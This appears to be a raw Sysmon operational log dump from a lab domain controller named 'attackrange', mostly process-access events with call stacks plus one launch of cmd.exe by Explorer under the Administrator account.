12:09:58.797{266CAFBE-64C5-6064-A500-00000000AE01}43561212C:\Windows\Explorer.EXE{266CAFBE-6696-6064-7701-00000000AE01}6920C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011199Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:58.797{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6696-6064-7801-00000000AE01}4264C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b7f60|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011198Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:58.797{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6696-6064-7801-00000000AE01}4264C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+112150|C:\Windows\System32\SHELL32.dll+b7f1c|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011197Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:58.797{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6696-6064-7801-00000000AE01}4264C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b7ef0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011196Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:58.797{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6696-6064-7801-00000000AE01}4264C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011195Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:58.766{266CAFBE-646C-6064-1000-00000000AE01}11242204C:\Windows\system32\svchost.exe{266CAFBE-6696-6064-7801-00000000AE01}4264C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011194Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:58.766{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-6696-6064-7801-00000000AE01}4264C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011193Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:58.766{266CAFBE-6696-6064-7801-00000000AE01}42641324C:\Windows\system32\conhost.exe{266CAFBE-6696-6064-7701-00000000AE01}6920C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011192Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:58.750{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000011191Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:58.750{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000011190Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:58.750{266CAFBE-64C1-6064-9100-00000000AE01}51083828C:\Windows\system32\csrss.exe{266CAFBE-6696-6064-7801-00000000AE01}4264C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000011189Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:58.750{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12111|C:\Windows\SYSTEM32\psmserviceexthost.dll+170a8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011188Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:58.750{266CAFBE-64C5-6064-A500-00000000AE01}43566308C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x800000000000000011187Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:58.750{266CAFBE-64C5-6064-A500-00000000AE01}43566308C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011186Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:58.750{266CAFBE-64C5-6064-A500-00000000AE01}43566280C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011185Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:58.750{266CAFBE-64C5-6064-A500-00000000AE01}43566280C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011184Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:58.750{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12111|C:\Windows\SYSTEM32\psmserviceexthost.dll+170a8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x800000000000000011183Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:58.750{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011182Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:58.750{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011181Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:58.750{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011180Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:58.750{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011179Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:58.750{266CAFBE-64C1-6064-9100-00000000AE01}51086184C:\Windows\system32\csrss.exe{266CAFBE-6696-6064-7701-00000000AE01}6920C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000011178Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:58.750{266CAFBE-64C5-6064-A500-00000000AE01}43566332C:\Windows\Explorer.EXE{266CAFBE-6696-6064-7701-00000000AE01}6920C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e55f|C:\Windows\System32\windows.storage.dll+16e1d5|C:\Windows\System32\windows.storage.dll+16dcc6|C:\Windows\System32\windows.storage.dll+16f138|C:\Windows\System32\windows.storage.dll+16daee|C:\Windows\System32\windows.storage.dll+fd005|C:\Windows\System32\windows.storage.dll+fd384|C:\Windows\System32\windows.storage.dll+fc9c0|C:\Windows\System32\windows.storage.dll+1663de|C:\Windows\System32\windows.storage.dll+1660d2|C:\Windows\System32\SHELL32.dll+99121|C:\Windows\System32\SHELL32.dll+97f86|C:\Windows\System32\SHELL32.dll+d6c91|C:\Windows\System32\SHELL32.dll+bcebe|C:\Windows\System32\windows.storage.dll+2d1a2|C:\Windows\System32\windows.storage.dll+2ce99|C:\Windows\System32\windows.storage.dll+2cd6f|C:\Windows\System32\SHELL32.dll+d6d17|C:\Windows\System32\SHELL32.dll+bcebe|C:\Windows\System32\SHELL32.dll+167aaf 154100x800000000000000011177Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:58.754{266CAFBE-6696-6064-7701-00000000AE01}6920C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" 
C:\Users\Administrator\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 10341000x800000000000000011176Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:58.735{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011175Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:58.735{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011174Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:58.735{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+925b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+650d|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+1e1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+4
9cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae 10341000x800000000000000011173Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:58.735{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+658c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64d9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+1e1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae 